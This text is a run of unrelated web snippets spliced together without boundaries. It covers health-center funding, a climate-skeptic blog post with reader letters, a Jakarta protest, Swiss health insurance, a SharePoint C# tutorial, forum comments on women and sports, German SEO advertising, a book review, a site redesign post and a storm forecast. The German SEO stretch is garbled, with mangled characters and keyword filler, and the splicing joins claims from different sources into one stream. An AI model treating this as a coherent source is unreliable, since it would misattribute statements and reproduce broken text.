If we spend on community health centers , you actually save money .
We also have a major problem with dental care in this country .
But community health centers provide that , and so , too , with mental - health counseling .
They also provide some of the lowest - cost prescription drugs in America .
This program , ironically enough , has widespread bipartisan support .
Even George W. Bush put money into this program .
John McCain campaigned on it .
In the stimulus package , we doubled funding to about $ 2 billion a year and brought it up to $ 4 billion .
How much of a funding increase would the $ 14 billion represent ?
It ’s over five years .
The $ 2 billion would have been $ 10 billion for that period .
The $ 14 billion of new money is on top of $ 10 billion .
So we ’ll have more than doubled the size of the program .
And that includes going from 100 million to 300 million for the National Health Service Corps .
Alongside the community health centers , where else does the bill have room to be improved in conference ?
I wo n't be on the conference committee so I wo n’t speculate .
My main focus right now is to get the $ 14 billion for this program .
Photo credit : Win McNamee / Getty .
My recent post at MasterResource , Climategate : Here Comes Courage ! , has been picked up in the blogosphere ( such as at WattsUpWithThat ) and has received several thousand views at MasterResource .
In my post , I profiled three individuals in the Houston area who in the post - Climategate environment have spoken up more forcefully against climate alarmism :
Dr. Neil Frank ( a former director of the National Hurricane Center in Miami and a weather forecaster at KHOU - Channel 11 in Houston ) ; Michelle Michot Foss , an internationally respected energy economist with the University of Texas at Austin and the past president of both the U.S. Association for Energy Economics ( 2001 ) and the International Association for Energy Economics ( 2003 ) ; and Peter Hartley , the George and Cynthia Mitchell Chair in Sustainable Development and Environmental Economics , and Professor of Economics , at Rice University .
Neil Frank ’s op - ed generated hundreds of online comments , and hundreds more views , with support being overwhelmingly positive ( see for yourself ) .
A number of comments are very appreciative of the Houston Chronicle for having published Frank ’s piece given the editorial position at the paper as New - York - Times alarmist .
( A number of readers also take the opportunity to fuss that their hometown paper is so one - sided . )
And I must add my frustration : the editorial board ’s jump from ‘ market failure ’ to government activism ( support of cap - and - trade , etc. ) as if there were not ‘ government failure ’ in the ‘ correction . ’
Political economy , anyone ?
But there is a good side at the Chronicle when one looks beyond the editorial board : science writer Eric Berger , a skeptic of Al Gore alarmism , and business columnist Loren Steffy , a skeptic of cap - and - trade .
I reprint the letters - to - the - editor below ( December 10 : all on Frank ’s article ) because the links typically get broken ( Houston Chronicle policy ? ) .
The seven printed letters were four supportive and three critical .
In one letter , a reader critical of Frank and climate skeptics provides a link to the Texas A&M Meteorology Department website where each member of the department signs onto the Intergovernmental Panel on Climate Change ( IPCC ) consensus .
Included is the statement :
“ If we do nothing to reduce our emissions of greenhouse gases , future warming will likely be at least two degrees Celsius over the next century .
This statement is worth challenging .
The most distinguished member of that department , Jerry North , has an estimate of 2C ( best guess ) that would have an error range that would fall on the low end below the sacrosanct IPCC range .
There is always another post for the weary , is n’t there ?
Appendix : Letters to the Editor ( Houston Chronicle )
Breath of fresh air
Neil Frank ’s article , “ Climategate : You should be steamed ” ( Page B10 , Jan. 3 ) was like a breath of fresh air to me .
I am not one of those “ qualified skeptics , ” but the whole global warming debate has never rung true to me .
While I do believe that all of us who inhabit this beautiful planet need to be responsible enough to care for it , I do n’t believe the Earth ’s climate has been thrown off kilter by our misuse .
I do believe that the Earth , since the beginning of time , has gone through periods and cycles of unpredictable and sometimes catastrophic weather patterns , some of which we have experienced in the last few years .
Claire Harris , Montgomery
Article was misleading
Neil Frank claims that climate skeptics are numerous and well qualified and that their critics , whom he rhetorically stigmatizes as “ alarmists , ” have unfairly depicted the skeptics as few in number , scientifically unqualified and tools of Big Oil .
He cites a petition questioning anthropogenic global warming signed by more than 9,000 Ph.D.s , and tells us that the Heartland Institute has sponsored three international meetings for skeptics attended by hundreds of scientists who heard presentations by more than 40 authors with “ outstanding scientific credentials . ”
He also notes that more than 200 members of the American Physical Society objected when that organization published support of man-made global warming claims .
Yet having Ph.D. after one ’s name is not an automatic indicator that one ’s opinion is authoritative or even informed .
A Ph.D. in French literature , electrical engineering , or even , as in Frank ’s case , meteorology , does not necessarily add weight to an opinion .
As for the Heartland Institute , it is not a scientific body or educational institution .
It is a right - wing think tank that has enjoyed the support of — you guessed it — Big Oil .
According to the Union of Concerned Scientists , between 1998 and 2005 the Heartland Institute received $ 561,500 in support from ExxonMobil , 40 percent of which was designated for projects dealing with climate science .
Many of the 138 cited “ experts ” listed on its Web site have no credentials in climate science .
As for the 206 objectors to the American Physical Society ’s position on global warming , this group represents less than one half of one percent of the Society ’s 47,000 members .
Had Frank ’s nightly weather forecasts been as misleading as his article , his ratings would quickly have dropped to zero .
Keith M. Parsons , Friendswood
Clearly present all sides
I applaud and support Neil Frank ’s article on the global warming issue , and I appreciate the Chronicle printing a contrary position to the mass hysteria that has been more the rule in the past .
The science of global warming is not the generally accepted concept that many would have us believe and to undertake a massive “ emission limit ” ( tax ) program that would seriously cripple the American economy is at best naive .
The Chronicle and other media need to continue with in - depth research that will inform the public and clearly present all sides of this important issue .
Dick Patyrak , Missouri City
Quite disappointed
I was quite disappointed to see that Neil Frank is still a naysayer .
I hoped that with all the increased evidence of largely man-made global warming , he would have changed his mind .
There is no question that climatology is not an exact science , and even the most ardent supporters of the theory of man-made global warming agree there is some uncertainty about exactly what is going on .
But it seems that the real question should be :
Why do the proponents have to prove their case , while all the naysayers have to do is poke a few holes ?
The naysayers will say that is because if we erroneously follow the recommendations of the man -made climate change proponents , we will waste billions of dollars on unnecessary carbon - reduction programs .
But I argue that if we erroneously follow the naysayers , the cost will be greater .
Just envision the effects of only a two - foot rise in ocean levels or the effects of the disappearance of the glacier fields whose melting waters nourish millions .
Thus it is the naysayers who should prove their case , which they certainly have not done .
Rudolf J. Freund , Spring
Thanks for Frank ’s courage
Neil Frank had the courage to write the truth , and the Chronicle had the courage to publish it .
His article is the truth , but it is politically incorrect to challenge Al Gore and the believers .
By contrast , the American Association of Petroleum Geologists , a prominent worldwide association of professionals , has had a committee to study global warming for several years , and it just decided to abandon the committee and not take any position because it is so political and controversial and the oil industry has had enough bad press already .
The association is yielding to public pressure .
Anyone who has taken historical geology , a freshman course , knows that the temperatures and sea levels have fluctuated drastically hundreds of times in the Earth ’s history .
We are just in another cycle .
Just as we have day / night , winter / summer , why would anyone presume that we do not have longer cycles of fluctuation to deal with also ?
Burton C. Bowen , Houston
Voices in the wilderness
I see that the distinguished meteorologist Neil Frank has joined industry advocacy groups like Heartland Institute in claiming that global warming is a hoax , perpetrated by tens , even hundreds of thousands of scientists around the world .
Nevertheless , Frank and his industry colleagues remain voices crying in the scientific wilderness — dozens and dozens of scientific and professional societies around the world agree that global warming is real , that it is caused by humans , and is potentially catastrophic .
For example , statements to this effect are available from the National Academy of Science ( http://dels.nas.edu/basc/climate-change/), and the American Physical Society ( http://www.aps.org/policy/statements/07_1.cfm).
There are really smart people in these organizations , and they should all know better .
Why , even the Texas A&M Meteorological Department has been snookered , saying it believes in human - caused global warming ( http://www.met.tamu.edu/weather-and-climate/climate-change-statement).
Stupid Aggies .
Ron Spross , Humble
Steamed about deception
I am steamed about the deception perpetrated by the climate alarmists , so I really appreciate Neil Frank weighing in on the subject .
He calmed us down during a major hurricane panic , and he brings common sense to the climate - change arguments .
His article is lucid and he is so correct in advocating that we should n’t let political agendas stifle science .
Bob Hopkins , Houston
Photos by Ulfa Ilyas ( above ) and PRP International ( below )
Jakarta , Indonesia -- January 28 , 2010 -- Thousands of Indonesians staged a mass protest in front of the presidential palace .
The protesters criticised the government of President Susilo Bambang Yudhoyono 's neoliberal policies and corruption on its 100th day in office .
ZURICH  Like every other country in Europe , Switzerland guarantees health care for all its citizens .
But the system here does not remotely resemble the model of bureaucratic , socialized medicine often cited by opponents of universal coverage in the United States .
Swiss private insurers are required to offer coverage to all citizens , regardless of age or medical history .
And those people , in turn , are obligated to buy health insurance .
That is why many academics who have studied the Swiss health care system have pointed to this Alpine nation of about 7.5 million as a model that delivers much of what Washington is aiming to accomplish  without the contentious option of a government - run health insurance plan .
In Congress , the Senate Finance Committee is dealing with legislation proposed by its chairman , Max Baucus , Democrat of Montana , which would require nearly all Americans to buy health insurance , but stops short of the government - run insurance option that is still strongly supported by liberal Democrats .
Posted on January 6 , 2010
C- SPAN's Brian Lamb : " American People Pay For All Of This "
" The American people pay for all of this that goes on in this town . "
( Source : Bill Press Show )
See also : SharePoint list access using the Repository pattern .
Books on SharePoint often show how to create lists from code by calling the SharePoint API from directly within a feature receiver .
This receiver would then contain in - place string literals for column names , create the columns , update the default view , and so on .
While such an approach provides for an nice demonstration of the SharePoint API , it tends to carry over into production code .
My take on feature receivers , however , is that they should contain the least amount of code .
Staying true to object - orientation and separation of concerns , list definition and creation should instead consist of a common set of classes and methods to be called from the receiver :
public override void FeatureActivated ( SPFeatureReceiverProperties p ) { using ( var site = p. Feature .
Parent as SPWeb ) { var employees = new EmployeesDefinition ( ) ; if (!ListDefinition.ListExists( site , employees.ListName ) ) employees .CreateOnSite( site ) ; } }
The first area to improve on is that of string literal field names getting duplicated across the code base .
String literals make it impossible for the compiler to enforce a consistent naming of columns .
As column names are used in defining the list , in forming CAML queries against it , and in accessing the result , misspelled column names is a common source of runtime errors .
The second area to improve on is that of duplication of code for doing common list operations , like checking for the existence of the list or removing its title column .
Lastly , we want to get rid of duplicate control logic , i.e. , verifying preconditions and calling the same series of methods with every list definition .
One approach to improving on these areas is to start by defining a base class for list definitions .
The base class combines helper methods , working on lists , with the Template pattern for defining the common steps of list creation :
public abstract class ListDefinition { public string ListName ; public string ListDescription ; protected SPList List ; public void CreateOnSite ( SPWeb site ) { if ( string . IsNullOrEmpty( ListName ) ) throw new ArgumentException ( " Expected not null or not empty list name member " ) ; if ( site == null ) throw new NullReferenceException ( " Expected valid site " ) ; CreateList ( site ) ; if ( List == null ) throw new NullReferenceException ( " Expected list member not null " ) ; CreateFields ( List ) ; UpdateDefaultView ( List ) ; SetAdditionalProperties ( List ) ; } protected abstract void CreateList ( SPWeb site ) ; protected virtual void CreateFields ( SPList l ) {} protected virtual void UpdateDefaultView ( SPList l ) {} protected virtual void SetAdditionalProperties ( SPList l ) {} public static void HideAndMakeTitleFieldNotRequiredOnItemNewAndEditPage( SPList l ) { var title = l.Fields .GetField ( " Title " ) ; title .
Required = false ; title .
Hidden = true ; title .
Update ( ) ; } public static bool ListExists ( SPWeb site , string listName ) { if ( string .
IsNullOrEmpty( listName ) ) throw new ArgumentException ( " ListNameMustNotBeNullOrEmpty " , listName ) ; SPList list = null ; try { list = site .
Lists[ listName ] ; } catch ( ArgumentException ) { // list not found } return list != null ?
true : false ; } }
At the core of the Template pattern is the template method .
It defines the steps of an algorithm through a series of method calls .
Each either abstract or virtual depending on if the step is mandatory or voluntary in the algorithm .
Subclasses then specify the behavior of individual steps by implementing or overriding methods .
In case of the ListDefinition class , CreateOnSite is our template method .
It ensures that context , in the form of an SPList instance , is passed along to each step in the algorithm .
Each subclass defines the specific characteristics of a list .
It defines constants for column names and their data types , the views and which column to index , and so on .
This makes for a concise , easy to read , and consistent list definition :
public class EmployeesDefinition : ListDefinition { public const string EmployeeId = " EmployeeId " ; public const string Name = " Name " ; public const string HireDate = " HireDate " ; public const string Remarks = " Remarks " ; public EmployeesDefinition ( ) { ListName = " AcmeEmployees " ; ListDescription = " Employees at Acme Corp. " ; } protected override void CreateList ( SPWeb site ) { var guid = site .
Lists .
Add( ListName , ListDescription , SPListTemplateType.GenericList ) ; List = site .
Lists [ guid ] ; } protected override void CreateFields ( SPList l ) { l.
Fields .
Add( EmployeeId , SPFieldType.
Integer , true ) ; l. Fields .
Add( Name , SPFieldType.
Text , true ) ; l. Fields .
Add(HireDate , SPFieldType.DateTime , true ) ; var remarks = ( SPFieldMultiLineText ) l. Fields[l .
Fields .
Add( Remarks , SPFieldType. Note , false ) ] ; remarks .
RichText = true ; remarks .
RichTextMode = SPRichTextMode .
FullHtml ; remarks .
Update ( ) ; l.Update ( ) ; } protected override void UpdateDefaultView ( SPList l ) { var v = l.DefaultView ; v.ViewFields.Delete ( " LinkTitle " ) ; v.ViewFields .Add( EmployeeId ) ; v.ViewFields .
Add( Name ) ; v.ViewFields .Add(HireDate ) ; v.ViewFields .
Add( Remarks ) ; v.Update ( ) ; } protected override void SetAdditionalProperties ( SPList l) { HideAndMakeTitleFieldNotRequiredOnItemNewAndEditPage(l ) ; l. Fields [ HireDate ] .
Indexed = true ; l.Update ( ) ; } }
Since the string literals have now become public constants , we get IntelliSense and compile - time checking referencing them .
In addition , by defining common operations on the base class and using the Template pattern , we reduce the amount of code that would otherwise have to go into each definition .
Finally , the base class asserts , on behalf of all subclasses , that the list name is set before attempting to create the list and that the SPList field is set after calling the CreateList method .
( Deleted comment ) From : musichica05
2010-01-05 03:52 am ( UTC )
The Jets do suck ... haha
I know girls like that , drives me crazy .. especially since they 're so obvious about not knowing anything about sports .
From : lazaefair
2010-01-05 01:54 am ( UTC )
I 'm extremely disinterested in sports and I feel bad about reinforcing that stereotype every time I ask a question .
( But I really do n't care about sports . :/)
But I 'm so sorry you have to deal with that and I 'm glad you kick their asses .
From : drivebyluna
2010-01-05 03:46 am ( UTC )
I feel the same way you do .
From : ctrl_zzzz
2010-01-05 06:56 am ( UTC )
Thirded .
I care less about sports than anyone else I know .
From : ultrapeach
2010-01-05 08:25 am ( UTC )
" I feel bad about reinforcing that stereotype every time I ask a question . "
Fourthed .
Although my male partner does n't know a great deal about it either , and most of the male friends I have , so at least there 's that .
From : brokentapedeck
2010 -01-05 10:45 am ( UTC )
Fifthed .
From : kitanabychoice
2010 -01-05 02:49 am ( UTC )
I can understand that , and I feel your pain even though I 'm not big into sports - watching ( I like to play them , though ) .
It 's the same thing in the gaming and graphic design community .
I can definitely hold my own in that arena ( genuine interest and it's what my degree will be in ! ) and I still get treated like " oh luls that 's so cute "
=/ From : bobella12
2010-01-05 04:11 am ( UTC )
Are you my twin ?
You 're right about the graphic design community , and it depresses me .
At the beginning of our program it was about % 70 female in a class on 150 , and now it 's three out of the twelve in the senior class .
From : kitanabychoice
2010 -01-05 04:49 am ( UTC )
Blah , those are horrible numbers ! >_<
What really annoys me is that as soon as I start talking about whatever design topic is of choice that evening , I get guys chiming in to give me " advice " , to let me know about the " latest " technologies , or try to play trivia with me to " test " me .
I be woman , computers is hard .
From : ctrl_zzzz
2010-01-05 06:58 am ( UTC )
Shit , where do you go to school ?
I 'm a graphic design major at the Art Institute of Boston .
I think the male / female ratio in our program is pretty even , actually .
From : bobella12
2010 -01-05 08:29 am ( UTC )
I 'm at the University of Tennessee at Knoxville .
The program is good , but for the first two years it was a lot more about weeding people out than it was about teaching design :/ From : jedibubbles
2010 -01 - 10 03:37 am ( UTC )
My animation department was roughly two - thirds men , one - third women .
From : ikabarra
2010-01-05 02:55 am ( UTC )
I know how you feel on the religiously following sports front - I love , love football ( the European kind ) and can probably kick any guy I know 's ass in footie trivia , or general knowledge about the game .
I guess I 've been very , very lucky though , because though I fully expected people to be sceptical that I 'm a female fan , I find , atleast in RL , that people hardly ever bat an eyelash if I tell them I love football , even similar diehard male fans .
And I come from a pretty sexist , patriarchal country .
I suppose its because Indians are pretty mad about the sports they follow - not football , but when it comes to cricket , no man , woman or child is spared from the fanaticism .
While a few odd films make fun of wives not letting their husbands watch the ' big game ' , every girl I 've seen is pretty mad about cricket , and all the guys prettymuch are n't surprised by that .
That acceptance has sort of stretched to sports in general , I guess .
I feel lucky though , reading this .
My guy friends love talking football with me , and not in a patronizing , or even an ' aww , how cute sort of way , ' , but a genuine discussion when they need it .
In fact , the only guy who told me I support a team because ' their captain is good looking , she must like him , ' was a 11 year old .
From : musichica05
2010 -01-05 03:49 am ( UTC )
You are lucky .
I get the " you only like them because they 're cute " alot too , when I tell people I like the NY Giants / NY Mets .
I 'll admit , Eli Manning and David Wright are cute , but they are n't the sole reason I watch .
Believe me , 1 cute guy is not enough to sit through a 3 hour baseball game ... haha From : ikabarra
2010-01-05 03:51 am ( UTC )
I totally agree .
Besides , if I was watching only for the cute guys , I would n't watch the games per say , just the post match interviews and the parts they take their shirts off , or something .
There 's way too much zooming out during the game , and all the guys are just little coloured blurs for 90 minutes .
Get a clue , men .
From : dig_your_self
2010-01-05 03:43 am ( UTC )
I love people 's faces when I tell them my favourite boxer and list his stats , really is priceless shattering all of their preconceptions about women and " men 's " sports .
From : drivebyluna
2010 -01-05 03:45 am ( UTC )
This is the nice thing about my guy , he hates sports as much as I do .
From : bobella12
2010-01-05 04:14 am ( UTC )
I envy you .
It 's been nothing but nonstop football here for days .
DAYS I TELL YOU !
From : drivebyluna
2010-01-05 04:53 am ( UTC )
: D From : saltedpin
2010 -01-05 03:50 am ( UTC )
I feel your pain .
I had an hilarious discussion with a guy once when he felt the need to explain offside to me , but ended up getting himself hopelessly confused .
I patiently explained the whole thing to him , which he did not like much at all .
The silliest thing was I never asked him to tell me in the first place .
From : ikabarra
2010-01-05 03:54 am ( UTC )
Women explaining the offside rule to men ftw .
From : saltedpin
2010 -01-05 03:59 am ( UTC )
Hehe , the good part is that once you know it , you really know it !
From : ikabarra
2010-01-05 04:01 am ( UTC )
And then you start wondering why everyone gets so confused about it all the time .
From : saltedpin
2010 -01-05 04:25 am ( UTC )
I know !
It 's really not that difficult -- I guess to eyes that are n't familiar with it , seeing someone called offside might be a little mysterious , as it's not like fouling or something where it 's ultra-obvious .
From : eggsnail
2010-01-05 03:06 pm ( UTC )
It took me a little while to catch the offside calls .
Then I could finally start screaming , " He 's offside ! " before it was called .
Proud day for me .
:D From : soiamme
2010-01-05 01:14 pm ( UTC )
though I 'm not totally interested in sports , I still do know quite a bit about sports ( I mainly enjoy sports as a means of connection with my dad ... though I played handball for some time .
it was great ) and it annoys me when people try to explain sport terms to me .
but I feel your pain completley ..
I enjoy computer games and hardcore punk .
and there it goes the same way as in sports .
when I tell people I play video games they think of wii ( though I do own one since christmas .
thehe ) ... even though most of my games are rated 18 + and it's the typical ' boys games ' ( the best counter strike player in my circle of friends is ironically a girl ) .. and when they think of hardcore punk they see a girl dressed in all black with an ' emo ' haircut who 's only into the singer ... uh ... no , sir .
I go in the pit and rock my heart out , I know the words by heart because I agree with them ... and just because I talk with a band guy occassionally does n't mean I 'm a groupie ... ( gaaah RAGE ! )
in the end it always comes down to girls either being seen as ' dumb ' , all about sex , or lesbians ( because apparently it 's normal for lesbians to like boys stuff or wtf ? )
( more rage ! )
From : amycooper
2010-01-05 06:46 pm ( UTC )
I have a friend who went to art school and had the very same problem except with graphic novels .
Actually , the very first time she met my boyfriend ( now husband ) they got in a fight over something about Spiderman .
She got miffed because she thought it was the same thing ... until he took the time to look it up , realize she was right and emailed her about it , apologizing .
They get along great now . :)
From : dernhelm1982
2010-01-05 07:13 pm ( UTC )
My Mom is a big baseball fan and she played softball in High School .
At work she got tired of all the guys explaining the " rules " to her and she put them in their place by telling them the correct rules .
She worked at a store that was very male dominated and they 'd leave Mom with three day 's work to do in a single day while they went off and partied .
She called them on it in front of Dad saying that they should start pulling their own weight in the store or she'd go to the managers and start complaining .
One of the guys said " You 're just mad that you have equal rights now . "
Dad got mad and said , " No it 's not ' equal rights ' !
You lot are just too fuckin ' lazy to do your job ! "
From : philstar22
2010-01-06 11:44 pm ( UTC )
I only like a couple of sports ( baseball and football ) .
The funny thing is , my dad hates sports , as does the rest of my family .
So , when I 'm home , there is no one to watch them with .
When I 'm at school , I can usually find someone who is watching something so I can enjoy .
I do hate how guys feel they have to explain everything to you .
Even when I explain back enough that it is clear I know what I 'm talking about , some guys still feel the need to treat me like an idiot who 's never seen a game before .
SISTRIX Toolbox : das meistgenutzte Tool der SEO - Profis .
Shopware was ist Google Update Web Vitals : Googles Mau00dfstab fu00 fcr die Page fast alles , was du bislang u00 fcber die Google CTR wusstest , nicht mehr nach einem Core Update : liegt es an mir oder SEO - Askpekte verstu00e4ndlich machen SEO ganzer Tag voller fu00 fcr jeden Tag und u00 fcber unsere grou00dfe SEO - Strategie - Leitfaden von SISTRIXsidebarfalsesupportfalsepostsposts_titleNeueste , ersten Schritte in der Toolboxurlhttps//www.sistrix.de/changelog/titleNeue,
Features und konkrete zur Toolbox direkt uns ein uns uns eine den Live - Chatis_chattruesupporttitleDein , direkter Draht zum SupportdescriptionKonnten , wir deine Frage auf unserer Webseite nicht beantworten ?
SEO SEM Mayen Koblenz Internetagentur , Online - Marketing , Suchmaschinenoptimierung , Webdesign SEO SEM Internetagentur seo-leopard e.K. bei Koblenz .
Alle Ergebnisse anzeigen 0 . Keine Produkte gefunden .
Keine Artikel in Ihrem Warenkorb .
Jetzt anrufen49 : 261 39410782 .
Outsourcing Google Ads. SEO Texte 300 Wörter .
SEO Texte 600 Wörter .
SEO Texte 800 Wörter .
SEO Texte 1200 Wörter .
Online Marketing Seminar .
Microsoft Advertising Partner . SEO Agentur 2020 erfolgsbasiert SEO Firma Suchhelden.de .
Online Marketing Agentur .
Bing Ads Betreuung .
Digital Corporate Websites .
Google Elevator Programm .
Wie es funktioniert ?
Google Business Eintrag .
Google Webmaster Tools .
Google Tag Manager .
Google Keyword Planner .
Sie suchen nach neuen Lösungen ?
Wir suchen nämlich immer nach neuen Herausforderungen und haben für alle digitalen , technischen und kommunikativen Maßnahmen die richtigen Spezialisten mit den passenden Werkzeugen im Team .
Nur ein Klick und Sie sind dabei !
Wir erstellen und optimieren Ihre Seite , Google Ads Kampagne , Social - Media - Kanäle u.v.m .
Als Full - Service - Agentur vollbringen wir Heldentaten für alle , die nicht am Boden bleiben wollen .
Wir kämpfen für Ihren Erfolg .
Nur ein Klick und Sie sind dabei !
Mit SEO im digitalen Rampenlicht .
Wir wissen natürlich ganz genau , wie Sie uns gefunden haben .
Wenn Sie dieses Wissen auch für Ihr Unternehmen nutzen wollen , sind Sie hier genau richtig .
Nur ein Klick und Sie sind dabei !
SEO Firma erfolgsbasiert und mit 100 % Geld zurück Garantie SEO , SEO Marketing und SEO Beratung von einer professionellen Webagentur .
SEO - Agentur Hamburg für Business IT , Software , B2B .
Lassen
Sie sich finden !
Die Suchmaschinenoptimierung Search Engine Optimization SEO ist für den Erfolg einer Webseite von kardinaler Bedeutung , da etwa 80 % der potenziellen Interessenten sich über Suchmaschinen informieren .
Doch sieht sich nur jeder vierte Nutzer die Ergebnisseiten über die Top10 - Ergebnisse hinaus an .
SEO Managerin Zertifikatslehrgang TH Köln .
Monotonie ade : SEO - Experte Daniel Reeh über den Beruf SEO Managerin .
Daniel Reeh , Head of SEO bei meinestadt.de , vermittelt den Teilnehmerinnen und Teilnehmern der Weiterbildung SEO Managerin , welche Faktoren Einfluss auf das Suchmaschinenranking haben und wie SEO - Maßnahmen evaluiert werden .
Im Interview erklärt der SEO - Experte , warum es als SEO Managerin und SEO Manager nie langweilig wird .
Local SEO für Unternehmen seonative .
Ein großer
Teil des lokalen SEO ist es , Ihr GMB - Profil so aktuell und genau wie möglich zu machen , so dass es eine höhere Chance hat , im Local Pack zu erscheinen sowie vertrauenswürdig , attraktiv und ansprechend genug ist , um einen Klick zu bekommen .
Suchmaschinenoptimierung Tipps und Grundlagen 2019 OMSAG .
Auch für Geschäftsmodelle , die sich auf eine bestimmte Region fokussieren möchten , gibt es eine spezielle SEO - Lösung : die lokale Suchmaschinenoptimierung .
Diese erfüllt die Aufgabe , dem Nutzer möglichst detailreiche Informationen über Dienstleister in seiner näheren Umgebung anzuzeigen .
Lokales SEO ist daher im Grunde genommen für jede Betriebsgröße interessant , die in erster Linie regional Kunden erreichen will .
Haben auch Sie Interesse daran , Ihre Google - Platzierung in der lokalen Suche zu verbessern ?
Der erste Schritt , damit Ihre Website bei Google Maps angezeigt wird , ist die kostenlose Anmeldung bei Google My Business .
Guide : Umsetzung der SEO .
Das Wichtigste noch einmal in Kürze .
Die Suchmaschine Google hat in den letzten Jahren eine starke Wandlung vollzogen .
Dank intelligenter Algorithmen ist das Zeitalter der Google - Trickserei endgültig vorbei .
Zwar sind Keyword - Analysen und Backlinks aus technischer Sicht noch immer relevant , doch im Fokus stehen mittlerweile Usability und User Experience , also der Mehrwert , den wirklich exzellenter Content bietet .
Ganzheitliches SEO bedeutet daher auch immer das durchdachte Zusammenspiel interdisziplinärer Prozesse .
SEO ist zudem ein dynamisches Spezialgebiet des Online - Marketings .
Was heute aktuell ist , kann morgen bereits dem Google - Algorithmus widersprechen .
Suchmaschinenoptimierung SEO Definition Onlinemarketing - Praxis .
Die Suchmaschinenoptimierung engl. search engine optimization ; Kurzform : SEO ist neben bezahlter Suchmaschinenwerbung ein Teil des Suchmaschinenmarketings .
Mit Hilfe der Suchmaschinenoptimierung können Websitebetreiber ihren Internetauftritt im Hinblick auf relevante Suchbegriffe für allgemeine Suchmaschinen optimieren und so ihre Position im Ranking verbessern .
Suchmaschinenoptimierung SEO Frankfurt ALMARON .
Sobald Sie uns den Auftrag erteilt haben , setzen sich unserer in der Suchmaschinenoptimierung erfahrenen Techniker daran , die Möglichkeiten für Frankfurt für Local SEO zu prüfen .
Nach ausgiebiger Analyse mit professionellen
Tools macht Ihnen unsere SEO - Agentur einen Vorschlag , wie Sie von Ihren Kunden in Frankfurt und Umland besser gefunden werden können .
Danach kommt der SEO - Text , der für diese Region Frankfurt eben speziell zugeschnitten ist .
Die Position bei den Suchergebnissen für die Schlagwörter steigt , und mehr Interessenten für Ihre Leistungen kommen auf Ihre Webseite .
Dann überzeugen
Sie durch professionelles Webdesign und Ihre Arbeit die Umsätze steigen .
Durch eine umfassende und fortwährende Betreuung sichern wir , dass alles nach Ihren Wünschen verläuft .
Haben wir Ihnen eine Suchmaschinenoptimierung für Ihre Region Frankfurt schmackhaft gemacht ?
Dann kontaktieren
Sie uns auf einem der vielen Nachrichtenkanäle : per Telefon , E-mail , oder auch persönlich .
Unsere Hilfestellungen zur optimalen Auffindbarkeit .
Jetzt mehr erfahren .
Jetzt mehr erfahren .
Jetzt mehr erfahren .
Erfahren
Sie mehr zu unserer Agentur .
Kontaktieren Sie Uns
Invisible forces that control our behavior have inspired our best story­tellers , from Euripides to Steven Spielberg .
Whether we ’re yanked around by jealous gods , Oedipal urges or poltergeists , the idea that we feel powerless to direct our own actions has a visceral appeal , one exploited by Shankar Vedantam in “ The Hidden Brain , ” his exploration of the unconscious mind .
Most previous popular treatments of subliminal forces have n’t been data driven .
Vedantam , who until recently wrote the Department of Human Behavior column for The Washington Post , hopes to fill that gap .
His entertaining romp through covert influences on human behavior began as a series of columns , and true to its genesis , it reads as vivid reportage overlaid with a sampling of science .
Ranging widely from the role of social conformity in violence to snapshots of racial and gender prejudice , Vedantam draws expansive arcs between findings from social psychology and the nation ’s sensibilities and voting patterns .
“ Unconscious bias reaches into every corner of your life , ” he writes , thanks to a “ hidden brain ” generally inaccessible through introspection .
As with crop circles , all we see are the traces left by covert attitudes , never the perp at the scene of the crime .
Colorful characters form the backbone of the narrative ; we meet a bickering , long - married academic couple , a rapist with great teeth , a woman working the night shift at a tire factory , a woman suffering from a rare form of dementia and a cult member .
What binds this motley crew together ?
All are victims of some form of irrationality — those imperceptible forces that often prompt our actions in the real world , the ones that are at odds with our ideals .
Image Credit ... Illustration by Dan Page
Most of us assume that honesty and generosity are personality traits polished over a lifetime of social interaction .
But Vedantam shows how imperceptible social signals determine , for example , how deeply you ’ll dig into your pocket .
In offices with an honor system for coffee , people are more likely to pay on days when a photograph of human eyes is discreetly posted above the coffee machine , according to one British study .
They ’re more prone to cheat if a still life of daisies is pasted there instead — even if they say they ’re unaware of either picture .
Another experiment demonstrates that you ’re likely to give a handsome tip to a waiter who repeats your food order verbatim .
In fact , you ’ll tip an average of 140 percent more than you would if he just paraphrases it .
It ’s all about social mimicry , apparently , our hidden ability to sync our behavior with the group’s .
If you 're reading this post in a Web browser , you 've probably already noticed that something is a little ... different .
This afternoon we pushed the second half of our Ars Version 5.5 that went live back in December .
As you poke around and use the site over the next few days , you should notice a large number of design ( and quite a few functional ) updates from the way the site used to look and operate .
From the category pages , to author bios , to our comments , there 's not a nook or cranny that 's been left untouched by Aurich Lawson 's nimble Photoshop fingers .
You 've probably seen quite a few new bits already , but I thought it might be helpful if we presented some of the biggest changes side by side with their older counterparts .
Category pages
An old category page " top "
The new category page " top . "
Note the cool new category headers , the restyled sidebar links , and the new treatment of articles .
An old category page .
A new category page .
Note how we highlight features here like we do on the front page .
Articles
An article in the old design .
A newly styled article .
Note how the content starts higher on the page , and the restyled article links in the sidebar .
How the bottom of an article looked in the old design .
The new bottom of an article .
Note the new comment bar , and newly minted sharing links , now featuring Facebook and a ton more ( including email ) in the " Share button . "
The Ars Premier Experience
How an article looks to an Ars Premier Subscriber
How the front page looks to an Ars Premier Subscriber
Author pages
An author page on the old design
Author bios on the new design .
Coming soon will be additional links for an author , like Twitter pages , personal blog , and more .
Footer
The old crusty footer .
New , super - fresh footer .
Comments
Comments on the old design .
Super sweet new comments .
The overall design is , we feel , a lot easier on the eyes .
We 're also calling out authors and staff members much better now .
Sidebar
The latest top stories sidebar box in the old design .
The latest top stories box on the new design .
Much cleaner look overall .
We 've removed the ability to use this box on the front page , as the whole front page replicates this functionality ( and more ) now .
Forums
Fresh new icons at the bottom of the forums .
Feedback
As with all our projects and changes here , we highly value the input of our readers .
If you have comments or constructive criticism , please feel free to leave them in the comments below .
If you prefer to use email , you can send your feedback to civis@arstechnica.com .
Thanks
None of this project would 've been possible without the work of our Technical Director Kurt Mackey , our Creative Director Aurich Lawson , our HTML / CSS Guru Greg Hines , our Developer and Project Manager Extraordinare Clint Ecker ( that 's me ) , or without the support , direction , and feedback from nearly the entire editorial staff here at Ars Technica .
The National Weather Service has also issued a high - surf advisory and a coastal flood warning for Los Angeles County beaches .
Meteorologist Jamie Meier predicted waves as high as 20 feet and winds as strong as 60 mph , compared with 6 - to 10 - foot surf and peak gusts of 30 mph Tuesday .
Officials issued a flash flood watch and thunderstorm warning for the region , forecasting sustained rainfall and fierce winds .
Forecasters say the strongest drenching could occur Thursday , with up to 3 inches of rain and the possible return of tornado - like conditions .
